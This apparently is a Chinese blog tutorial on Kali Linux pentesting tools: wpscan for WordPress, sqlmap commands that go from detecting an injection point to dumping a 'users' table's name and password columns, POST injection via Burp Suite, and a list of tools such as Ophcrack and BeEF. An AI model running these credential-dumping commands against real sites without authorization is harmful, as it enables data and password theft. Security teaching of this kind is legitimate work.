CMS扫描工具:
wpscan 是一个黑盒子WordPress漏洞扫描程序,可用于扫描远程WordPress安装以查找安全问题。
我在网络上找到的使用方法如下:
wpscan -u 网页网址
但这个指令根本无法使用,使用以下指令查看后:
wpscan -h
发现得用以下指令才对:
wpscan --url 域名地址
之后给的提示如下:
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
这个只对 WordPress(WP是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站)的 WEB 才有效。
SQL注入漏洞发现:
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 等。
注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
参考1检测注入点及注入类型:
sqlmap -u "http://url/PHP/jrltbbs/url.php?id=url"
当SQLMap执行该命令时,它会执行以下步骤:
1、判断可注入的参数;
2、判断可以用哪种SQL注入技术来注入;
3、识别出哪种数据库;
4、根据用户选择,读取哪些数据。
参考2列出所有数据库的名字:
sqlmap -u "http://url/PHP/jrltbbs/showmessage.php?id=url" --dbs
参考3列出当前数据库的名字:
sqlmap -u "http://url/PHP/jrltbbs/url.php?id=url" --current-db
参考4列出某数据库的所有表名:
sqlmap -u "http://url/PHP/jrltbbs/url.php?id=url" -D 'jrlt' --tables
参考5列出某表中的所有字段名:
sqlmap -u "http://url/PHP/jrltbbs/url.php?id=5" -D 'jrlt' -T 'users' --columns
参考6列出某字段中的所有字段内容:
sqlmap -u "http://url/PHP/jrltbbs/url.php?id=5" -D 'jrlt' -T 'users' -C 'name,password' --dump
参考post注入:
首先利用burpsuite抓到使用post请求方法的http请求数据包,将该包保存为post.txt文件(保存在当前目录下),输入以下指令:
sqlmap -r post.tx
输入以上指令后,会自动读取http数据包来做个post注入的测试。
网络抓包:
burpsuite 是可视化操作的工具,十分简单。
在浏览器的代理设置中,设置成本地 127.0.0.1 后,抓取本地 127.0.0.1 即可,如果需要设置端口,就设置成8080。
其它抓包工具有关《Kali 用 Wireshark 抓取网络数据包》可以参考。
其它渗透测试工具:
Metasploit(安全漏洞检测工具)。
Nmap(网络扫描和嗅探工具包)。
Ophcrack(利用彩虹表来破解 Windows密码的工具)。
Wireshark (网络封包分析软件)。
BeEF (浏览器渗透测试工具)。
有关《Kali 信息收集工具:子域、端口、目录、交互等》可以参考。
标签:sqlmap,http,渗透,Kali,url,Linux,--,PHP,注入 From: https://www.cnblogs.com/n5you/p/17470151.html